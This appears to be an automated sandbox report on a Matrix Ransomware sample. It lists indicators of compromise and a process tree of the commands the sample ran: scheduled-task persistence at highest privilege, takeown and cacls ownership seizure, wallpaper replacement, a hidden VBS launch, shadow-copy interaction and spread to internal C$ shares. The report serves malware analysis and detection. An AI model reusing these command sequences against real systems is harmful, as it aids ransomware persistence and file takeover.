File opened (read-only) \??\F: PsYzXFib64.exe File opened (read-only) \??\L: PsYzXFib64.exe File opened (read-only) \??\N: PsYzXFib64.exe File opened (read-only) \??\S: PsYzXFib64.exe File opened (read-only) \??\T: PsYzXFib64.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\AWMOUwTd.bmp" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.filesystem_1.4.100.v20140514-1614.jar afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\sl-si\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\tr-tr\ui-strings.js afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\nl-nl\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\uk-ua\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\sv_get.svg afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ko-kr\ui-strings.js afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-application-views.jar afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\progress-indeterminate.gif afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_listview_selected-hover.svg afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ru-ru\ui-strings.js afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\pt-br\AppStore_icon.svg afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\share_icons.png afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\themes\dark\example_icons.png afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\zh-tw\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\MANIFEST.MF afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\javafx.properties afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ko-kr\ui-strings.js afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\rhp_world_icon_hover_2x.png afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\pt-br\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ja-jp\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\fr-fr\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\next-arrow-hover.svg afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\ms_get.svg afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\css\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\Welcome.html afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\license.html afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\br.gif afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\themes\dark\example_icons2x.png afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\fr-fr\ui-strings.js afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\zh-cn\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\pl-pl\PlayStore_icon.svg afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\jsse.jar afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\reduced_mode-2x.png afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\dd_arrow_small2x.png afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\root\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\images\cursors\win32_MoveDrop32x32.gif afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\javafx-mx.jar afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_listview.svg afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_ellipses.svg afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\uk-ua\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\locale\org-openide-util_zh_CN.jar afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ru-ru\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\en-gb\ui-strings.js afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\eu-es\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\tr-tr\ui-strings.js afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\zh-cn\ui-strings.js afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\adobe_spinner.gif afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\zh-cn\ui-strings.js afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\uk-ua\ui-strings.js afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\line.cur afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\hr-hr\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark.css afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-charts_zh_CN.jar afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fr-fr\ui-strings.js afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_sortedby_up_18.svg afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\masterix.gif afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\new_icons_retina.png afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\dd_arrow_small2x.png afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\hu.pak afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\jfr.jar afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4412 schtasks.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 4312 vssadmin.exe -
Modifies Control Panel 5 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\Desktop reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\Desktop\WallpaperStyle = "0" reg.exe Key created \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\Desktop reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\Desktop\TileWallpaper = "0" reg.exe Key created \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\Desktop reg.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 4196 PsYzXFib64.exe 4196 PsYzXFib64.exe 4196 PsYzXFib64.exe 4196 PsYzXFib64.exe 4196 PsYzXFib64.exe 4196 PsYzXFib64.exe 4196 PsYzXFib64.exe 4196 PsYzXFib64.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 4196 PsYzXFib64.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeTakeOwnershipPrivilege 4300 takeown.exe Token: SeDebugPrivilege 4196 PsYzXFib64.exe Token: SeLoadDriverPrivilege 4196 PsYzXFib64.exe Token: SeTakeOwnershipPrivilege 4792 takeown.exe Token: SeTakeOwnershipPrivilege 4948 takeown.exe Token: SeTakeOwnershipPrivilege 5100 takeown.exe Token: SeTakeOwnershipPrivilege 3040 takeown.exe Token: SeTakeOwnershipPrivilege 4500 takeown.exe Token: SeTakeOwnershipPrivilege 4672 takeown.exe Token: SeTakeOwnershipPrivilege 4868 takeown.exe Token: SeTakeOwnershipPrivilege 4916 takeown.exe Token: SeTakeOwnershipPrivilege 4288 takeown.exe Token: SeTakeOwnershipPrivilege 4504 takeown.exe Token: SeTakeOwnershipPrivilege 4616 takeown.exe Token: SeTakeOwnershipPrivilege 4844 takeown.exe Token: SeTakeOwnershipPrivilege 5016 takeown.exe Token: SeTakeOwnershipPrivilege 4408 takeown.exe Token: SeTakeOwnershipPrivilege 4632 takeown.exe Token: SeTakeOwnershipPrivilege 4976 takeown.exe Token: SeTakeOwnershipPrivilege 4284 takeown.exe Token: SeTakeOwnershipPrivilege 4960 takeown.exe Token: SeTakeOwnershipPrivilege 4260 takeown.exe Token: SeTakeOwnershipPrivilege 4908 takeown.exe Token: SeTakeOwnershipPrivilege 4256 takeown.exe Token: SeTakeOwnershipPrivilege 2568 takeown.exe Token: SeTakeOwnershipPrivilege 4920 takeown.exe Token: SeTakeOwnershipPrivilege 4528 takeown.exe Token: SeTakeOwnershipPrivilege 3828 takeown.exe Token: SeTakeOwnershipPrivilege 4696 takeown.exe Token: SeTakeOwnershipPrivilege 4344 takeown.exe Token: SeTakeOwnershipPrivilege 4704 takeown.exe Token: SeTakeOwnershipPrivilege 2052 takeown.exe Token: SeTakeOwnershipPrivilege 2476 takeown.exe Token: SeBackupPrivilege 4840 vssvc.exe Token: SeRestorePrivilege 4840 vssvc.exe Token: SeAuditPrivilege 4840 vssvc.exe Token: SeIncreaseQuotaPrivilege 5396 WMIC.exe Token: SeSecurityPrivilege 5396 WMIC.exe Token: SeTakeOwnershipPrivilege 5396 WMIC.exe Token: SeLoadDriverPrivilege 5396 WMIC.exe Token: SeSystemProfilePrivilege 5396 WMIC.exe Token: SeSystemtimePrivilege 5396 WMIC.exe Token: SeProfSingleProcessPrivilege 5396 WMIC.exe Token: SeIncBasePriorityPrivilege 5396 WMIC.exe Token: SeCreatePagefilePrivilege 5396 WMIC.exe Token: SeBackupPrivilege 5396 WMIC.exe Token: SeRestorePrivilege 5396 WMIC.exe Token: SeShutdownPrivilege 5396 WMIC.exe Token: SeDebugPrivilege 5396 WMIC.exe Token: SeSystemEnvironmentPrivilege 5396 WMIC.exe Token: SeRemoteShutdownPrivilege 5396 WMIC.exe Token: SeUndockPrivilege 5396 WMIC.exe Token: SeManageVolumePrivilege 5396 WMIC.exe Token: 33 5396 WMIC.exe Token: 34 5396 WMIC.exe Token: 35 5396 WMIC.exe Token: 36 5396 WMIC.exe Token: SeIncreaseQuotaPrivilege 5396 WMIC.exe Token: SeSecurityPrivilege 5396 WMIC.exe Token: SeTakeOwnershipPrivilege 5396 WMIC.exe Token: SeLoadDriverPrivilege 5396 WMIC.exe Token: SeSystemProfilePrivilege 5396 WMIC.exe Token: SeSystemtimePrivilege 5396 WMIC.exe Token: SeProfSingleProcessPrivilege 5396 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3816 wrote to memory of 2436 3816 afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe 73 PID 3816 wrote to memory of 2436 3816 afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe 73 PID 3816 wrote to memory of 2436 3816 afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe 73 PID 3816 wrote to memory of 3416 3816 afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe 75 PID 3816 wrote to memory of 3416 3816 afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe 75 PID 3816 wrote to memory of 3416 3816 afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe 75 PID 3816 wrote to memory of 2132 3816 afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe 80 PID 3816 wrote to memory of 2132 3816 afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe 80 PID 3816 wrote to memory of 2132 3816 afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe 80 PID 3816 wrote to memory of 1560 3816 afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe 81 PID 3816 wrote to memory of 1560 3816 afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe 81 PID 3816 wrote to memory of 1560 3816 afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe 81 PID 2132 wrote to memory of 3552 2132 cmd.exe 84 PID 2132 wrote to memory of 3552 2132 cmd.exe 84 PID 2132 wrote to memory of 3552 2132 cmd.exe 84 PID 1560 wrote to memory of 2072 1560 cmd.exe 85 PID 1560 wrote to memory of 2072 1560 cmd.exe 85 PID 1560 wrote to memory of 2072 1560 cmd.exe 85 PID 2132 wrote to memory of 1668 2132 cmd.exe 86 PID 2132 wrote to memory of 1668 2132 cmd.exe 86 PID 2132 wrote to memory of 1668 2132 cmd.exe 86 PID 2132 wrote to memory of 3628 2132 cmd.exe 87 PID 2132 wrote to memory of 3628 2132 cmd.exe 87 PID 2132 wrote to memory of 3628 2132 cmd.exe 87 PID 3816 wrote to memory of 3060 3816 afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe 89 PID 3816 wrote to memory of 3060 3816 afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe 89 PID 3816 wrote to memory of 3060 3816 afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe 89 PID 3060 wrote to memory of 2136 3060 cmd.exe 91 PID 3060 wrote to memory of 2136 3060 cmd.exe 91 PID 3060 wrote to memory of 2136 3060 cmd.exe 91 PID 3060 wrote to memory of 4116 3060 cmd.exe 92 PID 3060 wrote to memory of 4116 3060 cmd.exe 92 PID 3060 wrote to memory of 4116 3060 cmd.exe 92 PID 3060 wrote to memory of 4140 3060 cmd.exe 93 PID 3060 wrote to memory of 4140 3060 cmd.exe 93 PID 3060 wrote to memory of 4140 3060 cmd.exe 93 PID 4140 wrote to memory of 4156 4140 cmd.exe 94 PID 4140 wrote to memory of 4156 4140 cmd.exe 94 PID 4140 wrote to memory of 4156 4140 cmd.exe 94 PID 4156 wrote to memory of 4196 4156 PsYzXFib.exe 95 PID 4156 wrote to memory of 4196 4156 PsYzXFib.exe 95 PID 3816 wrote to memory of 4232 3816 afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe 96 PID 3816 wrote to memory of 4232 3816 afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe 96 PID 3816 wrote to memory of 4232 3816 afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe 96 PID 4232 wrote to memory of 4280 4232 cmd.exe 98 PID 4232 wrote to memory of 4280 4232 cmd.exe 98 PID 4232 wrote to memory of 4280 4232 cmd.exe 98 PID 4232 wrote to memory of 4300 4232 cmd.exe 99 PID 4232 wrote to memory of 4300 4232 cmd.exe 99 PID 4232 wrote to memory of 4300 4232 cmd.exe 99 PID 4232 wrote to memory of 4324 4232 cmd.exe 100 PID 4232 wrote to memory of 4324 4232 cmd.exe 100 PID 4232 wrote to memory of 4324 4232 cmd.exe 100 PID 4324 wrote to memory of 4340 4324 cmd.exe 101 PID 4324 wrote to memory of 4340 4324 cmd.exe 101 PID 4324 wrote to memory of 4340 4324 cmd.exe 101 PID 4232 wrote to memory of 4364 4232 cmd.exe 102 PID 4232 wrote to memory of 4364 4232 cmd.exe 102 PID 4232 wrote to memory of 4364 4232 cmd.exe 102 PID 3816 wrote to memory of 4388 3816 afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe 103 PID 3816 wrote to memory of 4388 3816 afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe 103 PID 3816 wrote to memory of 4388 3816 afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe 103 PID 4388 wrote to memory of 4436 4388 cmd.exe 105 PID 4388 wrote to memory of 4436 4388 cmd.exe 105
Processes
-
C:\Users\Admin\AppData\Local\Temp\afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe"C:\Users\Admin\AppData\Local\Temp\afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe"1⤵
- Matrix Ransomware
- Modifies extensions of user files
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3816 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe" "C:\Users\Admin\AppData\Local\Temp\NWQEgMSH.exe"2⤵PID:2436
-
-
C:\Users\Admin\AppData\Local\Temp\NWQEgMSH.exe"C:\Users\Admin\AppData\Local\Temp\NWQEgMSH.exe" -n2⤵
- Executes dropped EXE
PID:3416 -
C:\Users\Admin\AppData\Local\Temp\NWQEgMSH.exe"C:\Users\Admin\AppData\Local\Temp\NWQEgMSH.exe" "\\10.10.0.55\C$"3⤵PID:4680
-
-
C:\Users\Admin\AppData\Local\Temp\NWQEgMSH.exe"C:\Users\Admin\AppData\Local\Temp\NWQEgMSH.exe" "\\10.10.0.61\C$"3⤵PID:4536
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\AWMOUwTd.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2132 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\AWMOUwTd.bmp" /f3⤵
- Sets desktop wallpaper using registry
- Modifies Control Panel
PID:3552
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵
- Modifies Control Panel
PID:1668
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵
- Modifies Control Panel
PID:3628
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\E8ukHodz.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:1560 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\E8ukHodz.vbs"3⤵PID:2072
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\ljRsjfML.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵PID:4376
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\ljRsjfML.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:4412
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵PID:4136
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:4440
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.db""2⤵
- Suspicious use of WriteProcessMemory
PID:3060 -
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.db" /E /G Admin:F /C3⤵PID:2136
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.db"3⤵
- Modifies file permissions
PID:4116
-
-
